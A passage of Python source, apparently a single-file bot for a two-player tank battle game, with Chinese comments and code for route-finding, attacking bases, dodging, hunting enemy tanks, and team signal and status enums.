print_inline(STEEL_SYMBOL) elif isinstance(field, WaterField): print_inline(WATER_SYMBOL) elif isinstance(field, TankField): tank = field if tank.side == 0: print_inline(BLUE_TANK_SYMBOL) elif tank.side == 1: print_inline(RED_TANK_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) print("\n" if not compact else "") print("%s\n" % CUT_OFF_RULE) #{ END 'map_.py' }# #{ BEGIN 'tank.py' }# class BattleTank(object): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的作战对象 使得该对象对于特定的 tank 对象为 Singleton """ key = (tank.side, tank.id) obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 用自定义的函数初始化,而不是 __init__ ,为了防止单例被反复调用 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map #self.__attackingRoute = None # 缓存变量 -> 为了支持地图回滚,将路线缓存暂时去掉了 def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self.side, self.id) def __copy__(self): return self def __deepcopy__(self): # singleton ! return self @property def field(self): return self._tank @property def tank(self): return self._tank @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def x(self): return self._tank.x @property def y(self): return self._tank.y @property def xy(self): return self._tank.xy @property def destroyed(self): return self._tank.destroyed @property def canShoot(self): # 本回合是否可以射击 return not Action.is_shoot(self._tank.previousAction) def is_this_field_in_our_site(self, field, include_midline=False): """ 判断某个 field 是否位于我方半边地盘 Input: - field Field - include_midline bool 是否包含分界线 """ base = self._map.bases[self.side] if include_midline: return ( np.abs( field.y - base.y ) <= 4 ) else: return ( np.abs( field.y - base.y ) < 4 ) def is_this_field_in_enemy_site(self, field, include_midline=False): # 默认不包含中线 """ 是否处于敌方半边的地图 """ return not self.is_this_field_in_our_site(field, include_midline= not include_midline) def is_in_our_site(self, include_midline=False): """ 是否处于我方半边的地图 Input: - include_midline bool 是否包含分界线 """ return self.is_this_field_in_our_site(self.tank, include_midline=include_midline) def is_in_enemy_site(self, include_midline=True): """ 是否处于地方半边的地图 """ return self.is_this_field_in_enemy_site(self.tank, include_midline=include_midline) def is_near_midline(self, offset=1): """ 是否在中线附近 Input: - offset int 定义中线范围为 4 ± offset 的范围 例如 offset = 1 则 [3, 5] 均为中线范围 """ return ( np.abs( self.y - 4 ) <= offset ) def get_surrounding_empty_field_points(self, **kwargs): """ 获得周围可以移动到达的空位 """ tank = self._tank map_ = self._map x, y = tank.xy points = [] for dx, dy in get_searching_directions(x, y, **kwargs): x3 = x + dx y3 = y + dy if not map_.in_map(x3, y3): continue fields = map_[x3, y3] if len(fields) == 0: points.append( (x3, y3) ) elif len(fields) > 2: continue else: field = fields[0] if isinstance(field, EmptyField): points.append( (x3, y3) ) else: continue return points def get_all_valid_move_actions(self, **kwargs): """ 所有合法的移动行为 """ tank = self._tank map_ = self._map actions = [] x1, y1 = tank.xy for x2, y2 in self.get_surrounding_empty_field_points(**kwargs): moveAction = Action.get_move_action(x1, y1, x2, y2) map_.is_valid_move_action(tank, moveAction) actions.append(moveAction) return actions def get_all_valid_shoot_actions(self): """ 获得所有合法的射击行为 """ if self.canShoot: return list(Action.SHOOT_ACTIONS) else: return [] def get_all_valid_actions(self): """ 获得所有合法的行为 """ return self.get_all_valid_move_actions() + self.get_all_valid_shoot_actions() + [ Action.STAY ] def get_all_shortest_attacking_routes(self, ignore_enemies=True, bypass_enemies=False, delay=0, **kwargs): """ 获得所有最短的进攻路线 -------------------------- Input: - ignore_enemies bool 是否将敌人视为空 - bypass_enemies bool 是否将敌人视为 SteelField 然后尝试绕过他0 - delay int 允许与最短路线延迟几步 WARNING: ignore_enemies 与 bypass_enemies 为互斥选项,至多选择一个 Yield From: - routes [Route] """ if ignore_enemies and bypass_enemies: raise ValueError("you can't think of enemies as steel and air at the same time") map_ = self._map tank = self._tank side = tank.side oppSide = 1- tank.side oppBase = map_.bases[oppSide] if ignore_enemies: matrix_T = fake_map_matrix_T_without_enemy(map_, tank.side) elif bypass_enemies: matrix_T = fake_map_matrix_T_thinking_of_enemy_as_steel(map_, tank.side) else: matrix_T = map_.matrix_T kwargs.setdefault("middle_first", False) # 优先边路搜索 routes = find_all_routes_for_shoot( tank.xy, oppBase.xy, matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, # 队友有可能会变成阻碍! 5cdde41fd2337e01c79f1284 Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, # 不将敌方坦克加入到其中 ), **kwargs) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_attacking_route(self, *args, **kwargs): """ 获得默认的最短攻击路径 """ for route in self.get_all_shortest_attacking_routes(*args, **kwargs): return route # 直接返回第一个 route def get_next_attacking_action(self, route=None): """ 下一个进攻行为,不考虑四周的敌人 Input: - route Route 自定义的攻击路径 默认为 None ,使用默认的最短路径 """ tank = self._tank map_ = self._map oppBase = map_.bases[1 - tank.side] battler = self if route is None: route = battler.get_shortest_attacking_route() if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明 start 和 end 相同,已经到达基地,这种情况也不可能 return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): # 但是,如果正前方就是基地,则不移动,只射击 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: continue elif len(fields) > 1: break else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): break # 钢墙不可以射穿 elif isinstance(field, BrickField): # 土墙认为可以射掉 continue elif isinstance(field, TankField): # 坦克也认为可以射掉 if field.side == tank.side: break # 队友坦克不进攻 continue # 敌方坦克在此处不应该出现,他们应该在上游的决策中被考虑到 elif field is oppBase: if battler.canShoot: # 这个时候如果能够射击,就优先射击 return action + 4 else: continue # 其他情况仍然优先移动 return action ## 遇到墙/敌方基地/坦克,不能移动 if battler.canShoot: # 尝试射击 action += 4 for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and field.side == tank.side: return Action.STAY # 仅需要防止射到队友 return action # 不能射击,只好等待 return Action.STAY def get_all_next_attacking_actions(self, routes=None): """ 返回所有给定路线的下一回合行为的并集 Input: - route [Route]/None Return: - actions [int] """ if routes is None: routes = self.get_all_shortest_attacking_routes() # 默认用所有最短的进攻路线 return list(set( self.get_next_attacking_action(route) for route in routes )) def get_all_shortest_defensive_routes(self, delay=0, **kwargs): """ 获得所有的回防路线 ---------------- 同 get_all_shortest_attacking_routes """ map_ = self._map tank = self._tank side = tank.side base = map_.bases[side] matrix_T = map_.matrix_T kwargs.setdefault("middle_first", True) routes = find_all_routes_for_move( tank.xy, base.xy, matrix_T, **kwargs, ) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_defensive_route(self, *args, **kwargs): """ 获取默认的最短路线 """ for route in self.get_all_shortest_defensive_routes(*args, **kwargs): return route # 直接返回第一个 def get_next_defensive_action(self, route=None): """ 获得下一个防御动作,不考虑周围敌人 """ tank = self._tank map_ = self._map base = map_.bases[tank.side] if route is None: route = self.get_shortest_defensive_route() if route.is_not_found(): return Action.STAY elif route.length == 0: return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): return action ## 遇到墙/己方基地/坦克,不能移动 if self.canShoot: # 尝试射击 action += 4 for field in self.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and field.side == tank.side: return Action.STAY # 仅需要防止射到队友 elif isinstance(field, BaseField) and field is base: return Action.STAY # 遇到己方基地 return action # 否则就是等待了 return Action.STAY def get_shortest_route_to_enemy(self, oppTank): """ 查找射杀敌方的最短路线 TODO: 可能需要判断水路 尚没有被使用过 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = find_shortest_route_for_shoot( tank.xy, oppTank.xy, map_.matrix_T, # 正常地图 block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, Field.TANK + 1 + oppSide, # 加入地方坦克 ), x_axis_first=True, # 优先左右拦截 ) return route def get_route_to_enemy_by_move(self, oppTank, block_teammate=True, **kwargs): """ 近身条件下,获得到达对方的路劲 """ tank = self._tank map_ = self._map side = tank.side if block_teammate: # 将己方坦克和重叠坦克视为 block block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ) else: block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ) # 优先左右拦截 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, oppTank.xy, map_.matrix_T, block_types=block_types, **kwargs, ) return route def get_route_to_point_by_move(self, x2, y2, **kwargs): """ 这个函数仅限于在基地中获得用来移动到两个 guard point 的最短路径 !s """ tank = self._tank map_ = self._map side = tank.side # 优先左右移动 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, (x2, y2), map_.matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ), **kwargs, ) return route def get_route_to_field_by_move(self, field, **kwargs): """ 上一个函数的一个简单扩展 """ x2, y2 = field.xy return self.get_route_to_point_by_move(x2, y2, **kwargs) def get_next_hunting_action(self, oppTank): """ 下一个追杀敌军的行为 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = self.get_shortest_route_to_enemy(oppTank) if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明自己和敌方重合,这种情况不应该出现 return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 见到敌人就开火,否则移动 shootAction = action + 4 destroyedFields = [] # 会被用到两次,因此缓存一下 if self.canShoot: destroyedFields = self.get_destroyed_fields_if_shoot(action) for field in destroyedFields: if isinstance(field, TankField) and field.side == side: # 有队友,停止射击 break else: # 否则再判断是否应该射击 for field in destroyedFields: if isinstance(field, TankField) and field.side == oppSide: return shootAction # 到此处说明没有敌人,或者有队友 ## 优先移动 if map_.is_valid_move_action(tank, action): return action ## 遇到路障,射击 if self.canShoot: for field in destroyedFields: if isinstance(field, TankField) and field.side == side: return Action.STAY # 遇到队友,等待 return shootAction ## 也不能射击?于是等待 return Action.STAY def get_manhattan_distance_to(self, field): """ 获得自身到 field 的曼哈顿距离,不考虑中间地形 通常用于判断 field 与自身距离是否为 2 ,也就是中间相隔一个格子 Input: - field Field/BattleTank/... 具有 xy, x, y 属性的 field 对象 """ x1, y1 = self.xy x2, y2 = field.xy return get_manhattan_distance(x1, y1, x2, y2) def get_manhattan_distance_to_point(self, x2, y2): """ 对上一函数的补充,允许传入 xy 作为变量 """ x1, y1 = self.xy return get_manhattan_distance(x1, y1, x2, y2) def get_enemies_around(self): """ 返回获得身边的 tank 可能有多架 WARNING: 这个函数可以返回空值,也就是没有任何敌人在身旁的时候也可以使用 如果需要知道 enemies 是谁,那么建议直接调用这个函数来确定身边情况 Return: - tanks [TankField]/[] """ tank = self._tank map_ = self._map x1, y1 = tank.xy enemies = [] for dx, dy in get_searching_directions(x1, y1): x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break currentFields = map_[x, y] if len(currentFields) == 0: # 没有对象 continue elif len(currentFields) > 1: # 多辆坦克 for field in currentFields: if isinstance(field, TankField) and field.side != tank.side: enemies.append(field) else: # len == 1 field = currentFields[0] if isinstance(field, (EmptyField, WaterField) ): continue elif not isinstance(field, TankField): # 说明这个方向上没有敌人 break elif field.side != tank.side: # 遇到了敌人 enemies.append(field) else: # 遇到了队友 break return enemies def has_enemy_around(self): """ 周围是否存在敌军 """ return len(self.get_enemies_around()) > 0 def has_overlapping_enemy(self): """ 是否与敌方坦克重合 """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: assert isinstance(field, TankField), "unexpected field %r" % field if field.side != tank.side: return True return False def get_overlapping_enemy(self): """ 获得与自身重叠的坦克 认为一般只与一架坦克重合,所以返回遇到的第一辆坦克 WARNING: - 这个函数调用前,必须先检查是否有重叠的敌人 Return: - tank TankField """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: if field.side != tank.side: return field raise Exception("no overlapping enemy was found") def try_dodge(self, oppTank): """ 尝试回避对方 tank Input: - oppTank TankField/BattleTank 能够通过 x, y, xy 获取坐标值的坦克对象 Return: - actions [int] 能够闪避开的行为值,可能为空 """ tank = self._tank map_ = self._map side = tank.side base = map_.bases[side] oppBase = map_.bases[1- side] teammate = map_.tanks[side][1 - tank.id] battler = self x1, y1 = tank.xy x2, y2 = oppTank.xy if battler.is_in_our_site(): x3, y3 = base.xy # 在本方地盘,优先朝自己基地的方向闪现 else: x3, y3 = oppBase.xy # 在对方地盘,优先朝着对方基地的方向闪现 actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 优先逃跑向对方基地 x4 = x1 + dx y4 = y1 + dy if x4 == x2 or y4 == y2: # 逃跑方向不对 continue action = Action.get_action(x1, y1, x4, y4) if map_.is_valid_move_action(tank, action): actions.append(action) # # 应该朝着远离队友的方向闪避? 5ce915add2337e01c7abd895 # # 因为 BUG ,这个功能尚未实现 5ce9ce0cd2337e01c7acfd5c # # # 我决定不删掉这里的任何一条 DEBUG 注释来纪念这个花了 5 个小时都没有搞懂的 BUG # 没有错,把下面这段全部注释掉,这个程序就一点 BUG 都没有了 # '''def _cmp(action): #debug_print("Inner: ", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() with map_.simulate_one_action(tank, action): #map_.debug_print_out() return battler.get_manhattan_distance_to(teammate)''' #debug_print("Before:", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() #debug_print(teammate.previousAction) '''if battler.on_the_same_line_with(teammate): # 仅仅在处于同一行时成立 #debug_print(actions) actions.sort(key=lambda action: _cmp(action), reverse=True) #debug_print(actions)''' #debug_print(teammate.previousAction, "\n") # 因为一些奇怪的原因,地图没有正确回滚!! #map_.debug_print_out() #debug_print("After: ", id(map_), id(battler), id(teammate), id(action), action) #debug_print("") ### END BUG ### return actions def can_dodge(self): """ 当前地形是否拥有闪避的机会,用于判断是否处在狭路,与 len( try_dodge ) > 0 不等价 """ tank = self._tank map_ = self._map x, y = self._tank.xy actions = [] for dx, dy in get_searching_directions(x, y): x3 = x + dx y3 = y + dy moveAction = Action.get_action(x, y, x3, y3) if map_.is_valid_move_action(moveAction): actions.append(moveAction) if len(actions) < 2: # 不可能闪避 return False if len(actions) >= 3: # 可以 return True assert len(actions) == 2 return not Action.is_opposite(*actions) # 相反方向,无法闪避,否则可以 def break_brick_for_dodge(self, oppTank): """ 尝试凿开两边墙壁,以闪避敌人进攻 适用条件: 自己处在 WAIT_FOR_MARCHING 状态,身边没有遇敌的时候 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side base = map_.bases[side] oppBase = map_.bases[oppSide] x1, y1 = tank.xy x2, y2 = oppTank.xy if self.is_in_our_site(): # 选择性同 try_dodge x3, y3 = base.xy else: x3, y3 = oppBase.xy actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 按照惯例,优先凿开移向对方基地的墙 x3 = x1 + dx y3 = y1 + dy if x3 == x2 or y3 == y2: # 方向不对,不能凿开相隔的墙 continue # 需要判断两边的墙壁是否为不可凿开的对象 if not map_.in_map(x3, y3): continue fields = map_[x3, y3] assert len(fields) == 1, "not suit for current situation" field = fields[0] if isinstance(field, BrickField): action = Action.get_action(x1, y1, x3, y3) + 4 # 射击行为一定成功 actions.append(action) else: # 其他都是不适用的 continue return actions def move_to(self, oppTank): """ 返回 self -> oppTank 的移动 Input: oppTank TankField/BattleTank 所有带坐标的 tank 对象 """ x1, y1 = self._tank.xy x2, y2 = oppTank.xy assert x1 == x2 or y1 == y2, "can't be used when two tanks are not in line" return Action.get_action(x1, y1, x2, y2) def shoot_to(self, oppTank): """ 返回 self -> oppTank 的射击行为,相当于 move + 4 """ return self.move_to(oppTank) + 4 def on_the_same_line_with(self, field, ignore_brick=True): """ 是否和某个块处在同一条直线上 Input: field 任何带坐标的 tank 对象 ignore_brick bool 是否忽略土墙的阻挡 """ tank = self._tank map_ = self._map x1, y1 = tank.xy x2, y2 = field.xy if x1 != x2 and y1 != y2: # 坐标上直接可以否掉的情况 return False elif (x1, y1) == (x2, y2): # 重叠,这种情况一般不会出现,但是还是判断一下 return True if x1 == x2: dx = 0 dy = np.sign(y2 - y1) elif y1 == y2: dx = np.sign(x2 - x1) dy = 0 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break _fields = map_[x, y] if len(_fields) == 0: continue elif len(_fields) == 2: if field.xy == (x, y): # 说明处在在多人坦克里 return True else: # 否则不算 return False else: _field = _fields[0] if _field.xy == field.xy: # 和这个块坐标相同(注意不要用 is 来判断,因为传入的可能是 BattleTank) return True elif isinstance(_field, (EmptyField, WaterField) ): continue elif isinstance(_field, BrickField): if ignore_brick: # 这种情况将 brick 视为空 continue else: return False else: return False # 其他所有的 block 类型均视为 False # 没有检查到受阻的情况,那么就是在同一条直线上了 return True def back_away_from(self, oppTank): """ 背向远离地方坦克 """ return (self.move_to(oppTank) + 2) % 4 # 获得相反方向 def get_destroyed_fields_if_shoot(self, action): """ 如果向 action 对应的方向射击,那么可以摧毁什么东西? ------------------------------------------------------------ 主要用于 move 不安全而又不想白白等待的情况,尝试采用进攻开路 也可以用于其他问题的判断 Input: - action int 原始的移动行为(虽然事实上也可以是射击 :) Return: - fields [Field] 将被摧毁的对象 """ assert Action.is_move(action) or Action.is_shoot(action) tank = self._tank map_ = self._map action %= 4 x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: # 没有对象 continue elif len(fields) > 1: # 多辆坦克 return fields else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): return [] else: return fields return [] def will_destroy_a_brick_if_shoot(self, action): """ 如果当前回合射击,是否能够摧毁一个墙 """ destroyedFields = self.get_destroyed_fields_if_shoot(action) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField): return True return False def is_face_to_enemy_base(self, ignore_brick=False): """ 是否直面对方基地,或者是与敌人基地处在同一条直线上 (一个历史遗留接口) Input: - ignore_brick bool 是否忽略土墙,如果忽略,那么只需要基地和坦克 处在同一直线上即可 """ oppBase = self._map.bases[1 - self.side] return self.on_the_same_line_with(oppBase, ignore_brick=ignore_brick) def is_closest_to(self, field, allow_diagonal=True): """ 是否紧贴某个 field 也就是与之相邻或恰为对角 Input: - field Field 事实上只要带有 xy 属性的类都可以 - allow_diagonal bool 是否将对角线关系也算入 """ x1, y1 = self.xy x2, y2 = field.xy isInnermost = ( np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1 ) if allow_diagonal: return isInnermost else: return isInnermost and (x1 == x2 or y1 == y2) # 还需要共线 def get_enemy_behind_brick(self, action, interval=0): """ 返回行为对应的方向后的围墙后的敌人 乙方坦克和围墙间可以有任意空位 围墙到敌方坦克间至多有 interval 个空位 Input: - action int 移动/射击行为,确定方向 - interval int 最远检查到距离墙多远的位置? interval = 0 表示只检查最靠近墙的那个位置 特殊地 interval = -1 表示不限制 interval Return: - tank TankField/None 敌人对应的 tank 对象,多个敌人只返回一个 情况不符则返回 None """ tank = self._tank map_ = self._map x1, y1 = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action % 4] # 检查前方是否是墙 x2, y2 = x1, y1 while True: x2 += dx y2 += dy if not map_.in_map(x2, y2): return None fields = map_[x2, y2] if len(fields) == 0: continue elif len(fields) > 1: return None else: field = fields[0] if isinstance(field, BrickField): break # 此时 x2, y2 位置上是一个 Brick elif isinstance(field, (WaterField, EmptyField) ): continue else: return None # 检查前方是否有敌方坦克 x3, y3 = x2, y2 currentInterval = -1 while True: currentInterval += 1 if interval != -1 and currentInterval > interval: break x3 += dx y3 += dy if not map_.in_map(x3, y3): break fields = map_[x3, y3] if len(fields) == 0: continue elif len(fields) > 1: for field in fields: if isinstance(field, TankField) and field.side != tank.side: return field else: field = fields[0] if isinstance(field, TankField) and field.side != tank.side: return field elif isinstance(field, (WaterField, EmptyField) ): continue else: # 除了水路和空地可以继续搜索外,其他情况均直接结束 break return None def has_enemy_behind_brick(self, action): return self.get_enemy_behind_brick(action) is not None def get_nearest_enemy(self): #, block_teammate=False, isolate=False): """ 获得最近的敌人,移动距离 Input: - isolate bool 是否只考虑离自己最近,而不从团队整体考虑 如果联系整个团队,那么离自己最近的敌人定义为与我之间间隔的步数 和与我的队友之间间隔的步数差最小的敌人 Return: - enemy TankField """ '''tank = self._tank map_ = self._map _enemies = map_.tanks[1 - tank.side] enemies = [ enemy for enemy in _enemies if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 if len(enemies) == 0: # 胜利? return None if len(enemies) < 2: return enemies[0] # TODO: # 两种情况的决策顺序是有差别的,一个是见到走不通就 block_teammate = False 另一个是如果全部都走不通 # 就全部 block_teammate = False ,这可能会引发问题? if not isolate: # # 注:这是一个糟糕的设计,因为 BattleTank 对象最初被设计为只懂得单人决策的对象 # 他不应该知道队友的行为,但是此处打破了这个规则 # teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if teammateBattler.destroyed: pass else: deltaLengthWithEnemyList = [] for enemy in enemies: route1 = self.get_route_to_enemy_by_move(enemy) if route1.is_not_found(): route1 = self.get_route_to_enemy_by_move(enemy, block_teammate=False) if route1.is_not_found(): # 我无法到达敌人的位置??? continue route2 = teammateBattler.get_route_to_enemy_by_move(enemy) if route2.is_not_found(): route2 = teammateBattler.get_route_to_enemy_by_move(enemy, block_teammate=False) if route2.is_not_found(): deltaLength = route1.length # 这样做是否合理? else: deltaLength = route1.length - route2.length deltaLengthWithEnemyList.append( (deltaLength, enemy) ) idx = deltaLengthWithEnemyList.index( min(deltaLengthWithEnemyList, key=lambda tup: tup[0]) ) return deltaLengthWithEnemyList[idx][1] # 否则为单人决策 routes = [ self.get_route_to_enemy_by_move(enemy) for enemy in enemies ] if all( route.is_not_found() for route in routes ): # 均不可到达? routes = [ self.get_route_to_enemy_by_move(enemy, block_teammate=False) for enemy in enemies ] # 因为队友阻塞 ? routeWithEnemyList = [ (route, enemy) for route, enemy in zip(routes, enemies) if not route.is_not_found() # 队友阻塞导致 -1 需要去掉 ] idx = routeWithEnemyList.index( min(routeWithEnemyList, key=lambda tup: tup[0].length) ) return routeWithEnemyList[idx][1]''' tank = self._tank map_ = self._map enemies = [ enemy for enemy in map_.tanks[1 - tank.side] if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 battler = self teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if not teammate.destroyed: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) - teammate.get_manhattan_distance_to(enemy) ) # 综合队友的情况进行考虑,对方离我近,同时离队友远,那么那么更接近于我 else: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) ) def check_is_outer_wall_of_enemy_base(self, field, layer=2): """ 检查一个 field 是否为敌方基地的外墙 外墙被视为基地外的 layer 层 Brick """ if not isinstance(field, BrickField): return False map_ = self._map tank = self._tank oppBase = map_.bases[1 - tank.side] x1, y1 = oppBase.xy x2, y2 = field.xy return ( np.abs( x1 - x2 ) <= layer and np.abs( y1 - y2 ) <= layer ) def get_enemy_delay_if_bypass_me(self, oppBattler): """ 假设自己不移动,敌人必须要饶过我,那么他将因此延迟多少步 """ route1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) route2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if route1.is_not_found(): # TODO: 如何处理本来就找不到路的情况? return INFINITY_ROUTE_LENGTH if route2.is_not_found(): return INFINITY_ROUTE_LENGTH delay = route2.length - route1.length assert delay >= 0 # 显然必定会大于 0 ! return delay def can_block_this_enemy(self, oppBattler): """ 假设自己不移动,对方将不得不绕路,或者他将因此无路可走,那么就算是成功堵住了他 """ delay = self.get_enemy_delay_if_bypass_me(oppBattler) if delay == INFINITY_ROUTE_LENGTH: # 让敌人根本无路可走 return True return (delay >= 2) # 造成两步步以上的延迟,那么就算堵路成功 #{ END 'tank.py' }# #{ BEGIN 'strategy/signal.py' }# class Signal(object, metaclass=UniqueIntEnumMeta): __offset__ = 200 INVALID = -1 # 无效信号 NONE = 0 # 空信号 UNHANDLED = 1 # 未处理团队信号,通常是因为有更紧急的状况而没有运行到相应的处理信号的位置 CANHANDLED = 2 # 未能处理团队信号,通常是因为尝试处理但是发现不合适 PREPARE_FOR_BREAK_BRICK = 11 # 团队信号,准备破墙,先给自己寻找后路 READY_TO_PREPARE_FOR_BREAK_BRICK = 12 # 队员信号,准备好为破墙而凿开两边墙壁 FORCED_TO_BREAK_BRICK = 13 # 团队信号,强制破墙 READY_TO_BREAK_BRICK = 14 # 队员信号,准备要破墙 SUGGEST_TO_BREAK_OVERLAP = 15 # 团队信号,建议马上打破重叠 READY_TO_BREAK_OVERLAP = 16 # 队员信号,准备要主动打破重叠 FORCED_MARCH = 17 # 团队信号,强制行军 READY_TO_FORCED_MARCH = 18 # 队员信号,准备强制行军 SHOULD_LEAVE_TEAMMATE = 19 # 团队信号,需要和队友打破重叠 READY_TO_LEAVE_TEAMMATE = 20 # 队员信号,准备和队友打破重叠 SUGGEST_TO_BACK_AWAY_FROM_BRICK = 21 # 团队信号,建议反向远离墙壁 READY_TO_BACK_AWAY_FROM_BRICK = 22 # 队员信号,准备反向远离墙壁 @staticmethod def is_break(signal): """ 该信号是否意味着沟通停止 也就是是否为未处理或无法处理 """ return signal in ( __class__.INVALID, __class__.UNHANDLED, __class__.CANHANDLED, ) #{ END 'strategy/signal.py' }# #{ BEGIN 'strategy/status.py' }# class Status(object, metaclass=UniqueIntEnumMeta): __offset__ = 100 NONE = 0 # 空状态 AGGRESSIVE = 1 # 侵略性的 STALEMENT = 2 # 僵持的 DEFENSIVE = 3 # 防御性的 WITHDRAW = 4 # 撤退性的 DYING = 5 # 准备要挂了 DIED = 6 # 已经挂了 RELOADING = 9 # 正在装弹,下回合无法射击 ENCOUNT_ENEMY = 17 # 遇到敌人 ENCOUNT_ONE_ENEMY = 18 # 遇到一个敌人 ENCOUNT_TWO_ENEMY = 19 # 遇到两个敌人 OVERLAP_WITH_ENEMY = 20 # 正在和敌人重叠 KEEP_ON_MARCHING = 21 # 继续行军 READY_TO_ATTACK_BASE = 22 # 准备拆基地 READY_TO_FIGHT_BACK = 23 # 准备反击 READY_TO_DODGE = 24 # 准备闪避敌人 READY_TO_KILL_ENEMY = 25 # 准备击杀敌人 READY_TO_BLOCK_ROAD = 26 # 准备堵路 KEEP_ON_OVERLAPPING = 27 # 等待与自己重叠的敌人的决策 WAIT_FOR_MARCHING = 28 # 存在风险,等待进攻 HAS_ENEMY_BEHIND_BRICK = 29 # 隔墙有人 PREVENT_BEING_KILLED = 30 # 为了防止被射击而停下 HUNTING_ENEMY = 31 # 主动追杀敌军 ACTIVE_DEFENSIVE = 32 # 主动防御状态 WILL_DODGE_TO_LONG_WAY = 33 # 遭遇敌人自己没有炮弹,为了保命而闪避,但是增加了攻击路线长度 OPPOSITE_SHOOTING_WITH_ENEMY = 34 # 正在和敌人对射 READY_TO_BACK_AWAY = 35 # 假装逃跑 READY_TO_CLEAR_A_ROAD_FIRST = 36 # 进攻时预先清除与自己相隔一步的土墙 READY_TO_DOUBLE_KILL_ENEMIES = 37 # 遇到敌人重叠在一起,尝试和两个敌人同归于尽 READY_TO_LEAVE_TEAMMATE = 38 # 准备和队友打破重叠 FACING_TO_ENEMY_BASE = 39 # 正面敌人基地,或者和敌人基地处在同一直线上 READY_TO_FOLLOW_ENEMY = 40 # 准备跟随墙后敌人的移动方向 READY_TO_WITHDRAW = 41 # 准备后撤 GRARD_OUR_BASE = 42 # 已经到达我方基地附近,进入守卫状态 STAY_FOR_GUARDING_OUR_BASE = 43 # 已经到达我方基地附近,准备停留等待 WAIT_FOR_WITHDRAWING = 44 # 等待回防,可能是由于敌人阻挡 MOVE_TO_ANOTHER_GUARD_POINT = 45 # 向着另一个 guard point 移动 ENEMY_MAY_APPEAR_BEHIND_BRICK = 46 # 也许会有敌人出现在墙后 READY_TO_CUT_THROUGH_MIDLINE = 47 # 